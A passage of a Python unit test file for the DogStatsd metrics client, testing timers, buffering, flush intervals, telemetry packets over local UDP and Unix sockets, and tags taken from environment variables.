packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('d', type_)\n self.assertEqual('distributed.test', name)\n self.assert_almost_equal(0.1, float(value), 0.09)\n\n # Repeat, force timer value in milliseconds\n @self.statsd.distributed('distributed.test', use_ms=True)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n\n # Ignore telemetry packet\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0]\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('d', type_)\n self.assertEqual('distributed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_timed(self):\n \"\"\"\n Measure the distribution of a function's run time.\n \"\"\"\n # In seconds\n @self.statsd.timed('timed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n # Repeat, force timer value in milliseconds\n @self.statsd.timed('timed.test', use_ms=True)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n self.statsd.flush()\n\n # Ignore telemetry packet\n packet = self.recv(2).split(\"\\n\")[0]\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_timed_in_ms(self):\n \"\"\"\n Timed value is reported in ms when statsd.use_ms is True.\n \"\"\"\n # Arm statsd to use_ms\n self.statsd.use_ms = True\n\n # Sample a function run time\n @self.statsd.timed('timed.test')\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n\n # Assess the packet\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n # Repeat, force timer value in seconds\n @self.statsd.timed('timed.test', use_ms=False)\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n func(1, 2, kwarg2=3)\n self.statsd.flush()\n\n packet = self.recv()\n name_value, type_ = packet.rstrip('\\n').split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_no_metric(self, ):\n \"\"\"\n Test using a decorator without providing a metric.\n \"\"\"\n\n @self.statsd.timed()\n def func(arg1, arg2, kwarg1=1, kwarg2=1):\n \"\"\"docstring\"\"\"\n time.sleep(0.5)\n return (arg1, arg2, kwarg1, kwarg2)\n\n self.assertEqual('func', func.__name__)\n self.assertEqual('docstring', func.__doc__)\n\n result = func(1, 2, kwarg2=3)\n # Assert it handles args and kwargs correctly.\n self.assertEqual(result, (1, 2, 1, 3))\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('tests.unit.dogstatsd.test_statsd.func', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n @unittest.skipIf(not is_higher_py35(), reason=\"Coroutines are supported on Python 3.5 or higher.\")\n def test_timed_coroutine(self):\n \"\"\"\n Measure the distribution of a coroutine function's run time.\n\n Warning: Python > 3.5 only.\n \"\"\"\n import asyncio\n\n source = \"\"\"\n@self.statsd.timed('timed.test')\nasync def print_foo():\n \"docstring\"\n import time\n time.sleep(0.5)\n print(\"foo\")\n \"\"\"\n exec(source, {}, locals())\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(locals()['print_foo']())\n loop.close()\n\n # Assert\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_context(self):\n \"\"\"\n Measure the distribution of a context's run time.\n \"\"\"\n # In seconds\n with self.statsd.timed('timed_context.test') as timer:\n self.assertTrue(isinstance(timer, TimedContextManagerDecorator))\n time.sleep(0.5)\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n self.assert_almost_equal(0.5, timer.elapsed, 0.1)\n\n # In milliseconds\n with self.statsd.timed('timed_context.test', use_ms=True) as timer:\n time.sleep(0.5)\n\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(500, float(value), 100)\n self.assert_almost_equal(500, timer.elapsed, 100)\n\n def test_timed_context_exception(self):\n \"\"\"\n Exception bubbles out of the `timed` context manager.\n \"\"\"\n class ContextException(Exception):\n pass\n\n def func(self):\n with self.statsd.timed('timed_context.test.exception'):\n time.sleep(0.5)\n raise ContextException()\n\n # Ensure the exception was raised.\n with pytest.raises(ContextException):\n func(self)\n\n # Ensure the timing was recorded.\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test.exception', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n def test_timed_context_no_metric_exception(self):\n \"\"\"Test that an exception occurs if using a context manager without a metric.\"\"\"\n\n def func(self):\n with self.statsd.timed():\n time.sleep(0.5)\n\n # Ensure the exception was raised.\n with pytest.raises(TypeError):\n func(self)\n\n # Ensure the timing was recorded.\n packet = self.statsd.socket.recv()\n self.assertIsNone(packet)\n\n def test_timed_start_stop_calls(self):\n # In seconds\n timer = self.statsd.timed('timed_context.test')\n timer.start()\n time.sleep(0.5)\n timer.stop()\n\n packet = self.recv(2).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(0.5, float(value), 0.1)\n\n # In milliseconds\n timer = self.statsd.timed('timed_context.test', use_ms=True)\n timer.start()\n time.sleep(0.5)\n timer.stop()\n\n packet = self.recv(2, reset_wait=True).split(\"\\n\")[0] # ignore telemetry packet\n name_value, type_ = packet.split('|')\n name, value = name_value.split(':')\n\n self.assertEqual('ms', type_)\n self.assertEqual('timed_context.test', name)\n self.assert_almost_equal(500, float(value), 100)\n\n def test_batching(self):\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.timing('timer', 123)\n self.statsd.close_buffer()\n expected = 'page.views:123|g\\ntimer:123|ms\\n'\n self.assert_equal_telemetry(\n expected,\n self.recv(2),\n telemetry=telemetry_metrics(metrics=2, bytes_sent=len(expected))\n )\n\n def test_flush(self):\n dogstatsd = DogStatsd(disable_buffering=False, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assertIsNone(fake_socket.recv(no_wait=True))\n dogstatsd.flush()\n self.assert_equal_telemetry('page.views:1|c\\n', fake_socket.recv(2))\n\n def test_flush_interval(self):\n dogstatsd = DogStatsd(disable_buffering=False, flush_interval=1, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(0.3)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(1)\n self.assert_equal_telemetry(\n 'page.views:1|c\\n',\n fake_socket.recv(2, no_wait=True)\n )\n\n def test_disable_buffering(self):\n dogstatsd = DogStatsd(disable_buffering=True, telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assert_equal_telemetry(\n 'page.views:1|c\\n',\n fake_socket.recv(2, no_wait=True)\n )\n\n def test_flush_disable(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n flush_interval=0,\n telemetry_min_flush_interval=0\n )\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.increment('page.views')\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(DEFAULT_FLUSH_INTERVAL)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n time.sleep(0.3)\n self.assertIsNone(fake_socket.recv(no_wait=True))\n\n @unittest.skip(\"Buffering has been disabled again so the deprecation is not valid\")\n @patch(\"warnings.warn\")\n def test_manual_buffer_ops_deprecation(self, mock_warn):\n self.assertFalse(mock_warn.called)\n\n self.statsd.open_buffer()\n self.assertTrue(mock_warn.called)\n self.assertEqual(mock_warn.call_count, 1)\n\n self.statsd.close_buffer()\n self.assertEqual(mock_warn.call_count, 2)\n\n def test_batching_sequential(self):\n self.statsd.open_buffer()\n self.statsd.gauge('discarded.data', 123)\n self.statsd.close_buffer()\n\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.timing('timer', 123)\n self.statsd.close_buffer()\n\n expected1 = 'discarded.data:123|g\\n'\n expected_metrics1=telemetry_metrics(metrics=1, bytes_sent=len(expected1))\n self.assert_equal_telemetry(\n expected1,\n self.recv(2),\n telemetry=expected_metrics1)\n\n\n expected2 = 'page.views:123|g\\ntimer:123|ms\\n'\n self.assert_equal_telemetry(\n expected2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=2,\n packets_sent=2,\n bytes_sent=len(expected2 + expected_metrics1)\n )\n )\n\n def test_batching_runtime_changes(self):\n dogstatsd = DogStatsd(\n disable_buffering=True,\n telemetry_min_flush_interval=0\n )\n dogstatsd.socket = FakeSocket()\n\n # Send some unbuffered metrics and verify we got it immediately\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge', 123),\n ('timing', 'rt.timer', 123),\n ],\n )\n\n # Disable buffering (noop expected) and validate\n dogstatsd.disable_buffering = True\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge2', 321),\n ('timing', 'rt.timer2', 321),\n ],\n last_telemetry_size = last_telemetry_size,\n )\n\n # Enable buffering and validate\n dogstatsd.disable_buffering = False\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'buffered.gauge', 12345),\n ('timing', 'buffered.timer', 12345),\n ],\n last_telemetry_size = last_telemetry_size,\n buffered=True,\n )\n\n # Enable buffering again (another noop change expected)\n dogstatsd.disable_buffering = False\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'buffered.gauge2', 321),\n ('timing', 'buffered.timer2', 321),\n ],\n last_telemetry_size = last_telemetry_size,\n buffered=True,\n )\n\n # Flip the toggle to unbuffered functionality one more time and verify\n dogstatsd.disable_buffering = True\n last_telemetry_size = self.send_and_assert(\n dogstatsd,\n [\n ('gauge', 'rt.gauge3', 333),\n ('timing', 'rt.timer3', 333),\n ],\n last_telemetry_size = last_telemetry_size,\n )\n\n def test_threaded_batching(self):\n num_threads = 4\n threads = []\n\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n def batch_metrics(index, dsd):\n time.sleep(0.3 * index)\n\n dsd.open_buffer()\n\n time.sleep(0.1)\n dsd.gauge('page.%d.views' % index, 123)\n\n time.sleep(0.1)\n dsd.timing('timer.%d' % index, 123)\n\n time.sleep(0.5)\n dsd.close_buffer()\n\n for idx in range(num_threads):\n thread = Thread(\n name=\"{}_sender_thread_{}\".format(self.__class__.__name__, idx),\n target=batch_metrics,\n args=(idx, dogstatsd)\n )\n thread.daemon = True\n\n threads.append(thread)\n\n for thread in threads:\n thread.start()\n\n time.sleep(5)\n\n for thread in threads:\n if thread.is_alive():\n thread.join(0.1)\n\n previous_telemetry_packet_size = 0\n thread_idx = 0\n\n while thread_idx < num_threads:\n first_message = \"page.{}.views:123|g\\n\".format(thread_idx)\n first_message_len = len(first_message)\n second_message = \"timer.{}:123|ms\\n\".format(thread_idx)\n second_message_len = len(second_message)\n\n received_payload = fake_socket.recv(1)\n\n # Base assumption is that we got both messages but\n # we may get metrics split depending on when the flush thread triggers\n if received_payload == first_message:\n message = first_message\n packet_size = first_message_len\n num_metrics = 1\n elif received_payload == second_message:\n message = second_message\n packet_size = second_message_len\n num_metrics = 1\n thread_idx += 1\n else:\n message = first_message + second_message\n packet_size = len(message)\n num_metrics = 2\n thread_idx += 1\n\n self.assertEqual(received_payload, message)\n\n packet_sent = 2\n if previous_telemetry_packet_size == 0:\n packet_sent = 1\n\n bytes_sent = previous_telemetry_packet_size + packet_size\n telemetry = telemetry_metrics(\n metrics=num_metrics,\n bytes_sent=bytes_sent,\n packets_sent=packet_sent,\n )\n self.assertEqual(telemetry, fake_socket.recv(1))\n\n previous_telemetry_packet_size = len(telemetry)\n\n def test_telemetry(self):\n self.statsd.metrics_count = 1\n self.statsd.events_count = 2\n self.statsd.service_checks_count = 3\n self.statsd.bytes_sent = 4\n self.statsd.bytes_dropped_writer = 5\n self.statsd.packets_sent = 6\n self.statsd.packets_dropped_writer = 7\n self.statsd.bytes_dropped_queue = 8\n self.statsd.packets_dropped_queue = 9\n\n\n self.statsd.open_buffer()\n self.statsd.gauge('page.views', 123)\n self.statsd.close_buffer()\n\n payload = 'page.views:123|g\\n'\n telemetry = telemetry_metrics(metrics=2, events=2, service_checks=3, bytes_sent=4 + len(payload),\n bytes_dropped_writer=5, packets_sent=7, packets_dropped_writer=7, bytes_dropped_queue=8, packets_dropped_queue=9)\n\n self.assert_equal_telemetry(payload, self.recv(2), telemetry=telemetry)\n\n self.assertEqual(0, self.statsd.metrics_count)\n self.assertEqual(0, self.statsd.events_count)\n self.assertEqual(0, self.statsd.service_checks_count)\n self.assertEqual(len(telemetry), self.statsd.bytes_sent)\n self.assertEqual(0, self.statsd.bytes_dropped_writer)\n self.assertEqual(1, self.statsd.packets_sent)\n self.assertEqual(0, self.statsd.packets_dropped_writer)\n self.assertEqual(0, self.statsd.bytes_dropped_queue)\n self.assertEqual(0, self.statsd.packets_dropped_queue)\n\n def test_telemetry_flush_interval(self):\n dogstatsd = DogStatsd(disable_buffering=False)\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n # Set the last flush time in the future to be sure we won't flush\n dogstatsd._last_flush_time = time.time() + dogstatsd._telemetry_flush_interval\n dogstatsd.gauge('gauge', 123.4)\n\n metric = 'gauge:123.4|g\\n'\n self.assertEqual(metric, fake_socket.recv())\n\n time1 = time.time()\n # Setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - dogstatsd._telemetry_flush_interval -1\n dogstatsd.gauge('gauge', 123.4)\n self.assert_equal_telemetry(\n metric,\n fake_socket.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=2,\n bytes_sent=2*len(metric),\n packets_sent=2,\n ),\n )\n\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n def test_telemetry_flush_interval_alternate_destination(self):\n dogstatsd = DogStatsd(telemetry_host='foo')\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n fake_telemetry_socket = FakeSocket()\n dogstatsd.telemetry_socket = fake_telemetry_socket\n\n self.assertIsNotNone(dogstatsd.telemetry_host)\n self.assertIsNotNone(dogstatsd.telemetry_port)\n self.assertTrue(dogstatsd._dedicated_telemetry_destination())\n\n # set the last flush time in the future to be sure we won't flush\n dogstatsd._last_flush_time = time.time() + dogstatsd._telemetry_flush_interval\n dogstatsd.gauge('gauge', 123.4)\n\n self.assertEqual('gauge:123.4|g\\n', fake_socket.recv())\n\n time1 = time.time()\n # setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - dogstatsd._telemetry_flush_interval - 1\n dogstatsd.gauge('gauge', 123.4)\n\n self.assertEqual('gauge:123.4|g\\n', fake_socket.recv(reset_wait=True))\n self.assert_equal_telemetry(\n '',\n fake_telemetry_socket.recv(),\n telemetry=telemetry_metrics(\n metrics=2,\n bytes_sent=14*2,\n packets_sent=2,\n ),\n )\n\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n def test_telemetry_flush_interval_batch(self):\n dogstatsd = DogStatsd(disable_buffering=False)\n\n fake_socket = FakeSocket()\n dogstatsd.socket = fake_socket\n\n dogstatsd.open_buffer()\n dogstatsd.gauge('gauge1', 1)\n dogstatsd.gauge('gauge2', 2)\n\n time1 = time.time()\n # setting the last flush time in the past to trigger a telemetry flush\n dogstatsd._last_flush_time = time1 - statsd._telemetry_flush_interval -1\n\n dogstatsd.close_buffer()\n\n metric = 'gauge1:1|g\\ngauge2:2|g\\n'\n self.assert_equal_telemetry(metric, fake_socket.recv(2), telemetry=telemetry_metrics(metrics=2, bytes_sent=len(metric)))\n # assert that _last_flush_time has been updated\n self.assertTrue(time1 < dogstatsd._last_flush_time)\n\n\n def test_dedicated_udp_telemetry_dest(self):\n listener_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n listener_sock.bind(('localhost', 0))\n\n def wait_for_data():\n global udp_thread_telemetry_data\n udp_thread_telemetry_data = listener_sock.recvfrom(UDP_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n port = listener_sock.getsockname()[1]\n\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_host=\"localhost\",\n telemetry_port=port,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('abc')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(udp_thread_telemetry_data, expected_telemetry)\n\n def test_dedicated_udp6_telemetry_dest(self):\n listener_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n listener_sock.bind(('localhost', 0))\n\n def wait_for_data():\n global udp_thread_telemetry_data\n udp_thread_telemetry_data = listener_sock.recvfrom(UDP_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n port = listener_sock.getsockname()[1]\n\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_host=\"::1\", # use explicit address, localhost may resolve to v4.\n telemetry_port=port,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('abc')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(udp_thread_telemetry_data, expected_telemetry)\n\n def test_dedicated_uds_telemetry_dest(self):\n tempdir = tempfile.mkdtemp()\n socket_path = os.path.join(tempdir, 'socket.sock')\n\n listener_sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n listener_sock.bind(socket_path)\n\n def wait_for_data():\n global uds_thread_telemetry_data\n uds_thread_telemetry_data = listener_sock.recvfrom(UDS_OPTIMAL_PAYLOAD_LENGTH)[0].decode('utf-8')\n\n with closing(listener_sock):\n dogstatsd = DogStatsd(\n host=\"localhost\",\n port=12345,\n telemetry_min_flush_interval=0,\n telemetry_socket_path=socket_path,\n )\n\n server = threading.Thread(target=wait_for_data)\n server.start()\n\n dogstatsd.increment('def')\n\n server.join(3)\n\n expected_telemetry = telemetry_metrics(metrics=1, packets_sent=1, bytes_sent=8)\n self.assertEqual(uds_thread_telemetry_data, expected_telemetry)\n\n shutil.rmtree(tempdir)\n\n def test_context_manager(self):\n fake_socket = FakeSocket()\n with DogStatsd(telemetry_min_flush_interval=0) as dogstatsd:\n dogstatsd.socket = fake_socket\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n dogstatsd.increment('my_counter', 3)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"my_counter:3|c\"\n\n metrics = '\\n'.join([metric1, metric2, metric3]) + \"\\n\"\n self.assertEqual(metrics, fake_socket.recv(no_wait=True))\n\n metrics_packet = telemetry_metrics(\n metrics=3,\n bytes_sent=len(metrics),\n packets_sent=1,\n )\n self.assertEqual(metrics_packet, fake_socket.recv(no_wait=True))\n\n def test_context_manager_restores_enabled_buffering_state(self):\n fake_socket = FakeSocket()\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0, disable_buffering=False)\n dogstatsd.socket = fake_socket\n\n with dogstatsd:\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n\n dogstatsd.gauge('newpage.views', 123)\n dogstatsd.timing('newtimer', 123)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"newpage.views:123|g\"\n metric4 = \"newtimer:123|ms\"\n\n metrics1 = '\\n'.join([metric1, metric2]) + \"\\n\"\n self.assertEqual(metrics1, fake_socket.recv(no_wait=True))\n\n metrics_packet1 = telemetry_metrics(metrics=2, bytes_sent=len(metrics1), packets_sent=1)\n self.assertEqual(metrics_packet1, fake_socket.recv(no_wait=True))\n\n metrics2 = '\\n'.join([metric3, metric4]) + \"\\n\"\n metrics_packet2 = telemetry_metrics(metrics=2, bytes_sent=len(metrics_packet1 + metrics2), packets_sent=2)\n self.assertEqual(metrics2, fake_socket.recv(reset_wait=True))\n self.assertEqual(metrics_packet2, fake_socket.recv())\n\n def test_context_manager_restores_disabled_buffering_state(self):\n fake_socket = FakeSocket()\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0, disable_buffering=True)\n dogstatsd.socket = fake_socket\n\n with dogstatsd:\n dogstatsd.gauge('page.views', 123)\n dogstatsd.timing('timer', 123)\n\n dogstatsd.gauge('newpage.views', 123)\n dogstatsd.timing('newtimer', 123)\n\n metric1 = \"page.views:123|g\"\n metric2 = \"timer:123|ms\"\n metric3 = \"newpage.views:123|g\"\n metric4 = \"newtimer:123|ms\"\n\n metrics1 = '\\n'.join([metric1, metric2]) + \"\\n\"\n self.assertEqual(metrics1, fake_socket.recv(no_wait=True))\n\n metrics_packet1 = telemetry_metrics(metrics=2, bytes_sent=len(metrics1), packets_sent=1)\n self.assertEqual(metrics_packet1, fake_socket.recv(no_wait=True))\n\n metrics2 = '\\n'.join([metric3]) + \"\\n\"\n metrics_packet2 = telemetry_metrics(metrics=1, bytes_sent=len(metrics_packet1 + metrics2), packets_sent=2)\n self.assertEqual(metrics2, fake_socket.recv())\n self.assertEqual(metrics_packet2, fake_socket.recv(no_wait=True))\n\n metrics3 = '\\n'.join([metric4]) + \"\\n\"\n metrics_packet3 = telemetry_metrics(metrics=1, bytes_sent=len(metrics_packet2 + metrics3), packets_sent=2)\n self.assertEqual(metrics3, fake_socket.recv())\n self.assertEqual(metrics_packet3, fake_socket.recv(no_wait=True))\n\n def test_batched_buffer_autoflush(self):\n fake_socket = FakeSocket()\n bytes_sent = 0\n with DogStatsd(telemetry_min_flush_interval=0, disable_buffering=False) as dogstatsd:\n dogstatsd.socket = fake_socket\n\n self.assertEqual(dogstatsd._max_payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH)\n\n single_metric = 'mycounter:1|c\\n'\n metrics_per_packet = dogstatsd._max_payload_size // len(single_metric)\n for _ in range(metrics_per_packet + 1):\n dogstatsd.increment('mycounter')\n payload = ''.join([single_metric for _ in range(metrics_per_packet)])\n\n telemetry = telemetry_metrics(\n metrics=metrics_per_packet+1,\n bytes_sent=len(payload),\n )\n bytes_sent += len(payload) + len(telemetry)\n self.assertEqual(payload, fake_socket.recv())\n self.assertEqual(telemetry, fake_socket.recv())\n\n self.assertEqual(single_metric, fake_socket.recv())\n\n telemetry = telemetry_metrics(metrics=0, packets_sent=2, bytes_sent=len(single_metric) + len(telemetry))\n self.assertEqual(telemetry, fake_socket.recv())\n\n def test_module_level_instance(self):\n self.assertTrue(isinstance(statsd, DogStatsd))\n\n def test_instantiating_does_not_connect(self):\n dogpound = DogStatsd()\n self.assertIsNone(dogpound.socket)\n\n def test_accessing_socket_opens_socket(self):\n dogpound = DogStatsd()\n try:\n self.assertIsNotNone(dogpound.get_socket())\n finally:\n dogpound.socket.close()\n\n def test_accessing_socket_multiple_times_returns_same_socket(self):\n dogpound = DogStatsd()\n fresh_socket = FakeSocket()\n dogpound.socket = fresh_socket\n self.assertEqual(fresh_socket, dogpound.get_socket())\n self.assertNotEqual(FakeSocket(), dogpound.get_socket())\n\n def test_tags_from_environment(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 'country:china,age:45,blue'\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#country:china,age:45,blue\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=\"country:china,age:45,blue\", bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_tags_from_environment_and_constant(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 'country:china,age:45,blue'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n tags = \"country:canada,red,country:china,age:45,blue\"\n metric = 'gt:123.4|g|#' + tags + '\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=tags, bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_entity_tag_from_environment(self):\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(tags=\"dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\", bytes_sent=len(metric)),\n dogstatsd.socket.recv())\n\n def test_entity_tag_from_environment_and_constant(self):\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n metric = 'gt:123.4|g|#country:canada,red,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(tags=\"country:canada,red,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\",\n bytes_sent=len(metric)),\n dogstatsd.socket.recv()\n )\n\n def test_entity_tag_and_tags_from_environment_and_constant(self):\n with preserve_environment_variable('DATADOG_TAGS'):\n os.environ['DATADOG_TAGS'] = 'country:china,age:45,blue'\n with preserve_environment_variable('DD_ENTITY_ID'):\n os.environ['DD_ENTITY_ID'] = '04652bb7-19b7-11e9-9cc6-42010a9c016d'\n dogstatsd = DogStatsd(constant_tags=['country:canada', 'red'], telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n dogstatsd.gauge('gt', 123.4)\n tags = \"country:canada,red,country:china,age:45,blue,dd.internal.entity_id:04652bb7-19b7-11e9-9cc6-42010a9c016d\"\n metric = 'gt:123.4|g|#' + tags + '\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(telemetry_metrics(tags=tags, bytes_sent=len(metric)), dogstatsd.socket.recv())\n\n def test_dogstatsd_initialization_with_dd_env_service_version(self):\n \"\"\"\n Dogstatsd should automatically use DD_ENV, DD_SERVICE, and DD_VERSION (if present)\n to set {env, service, version} as global tags for all metrics emitted.\n \"\"\"\n cases = [\n # Test various permutations of setting DD_* env vars, as well as other global tag configuration.\n # An empty string signifies that the env var either isn't set or that it is explicitly set to empty string.\n ('', '', '', '', [], []),\n ('prod', '', '', '', [], ['env:prod']),\n ('prod', 'dog', '', '', [], ['env:prod', 'service:dog']),\n ('prod', 'dog', 'abc123', '', [], ['env:prod', 'service:dog', 'version:abc123']),\n ('prod', 'dog', 'abc123', 'env:prod,type:app', [], ['env:prod', 'env:prod', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', 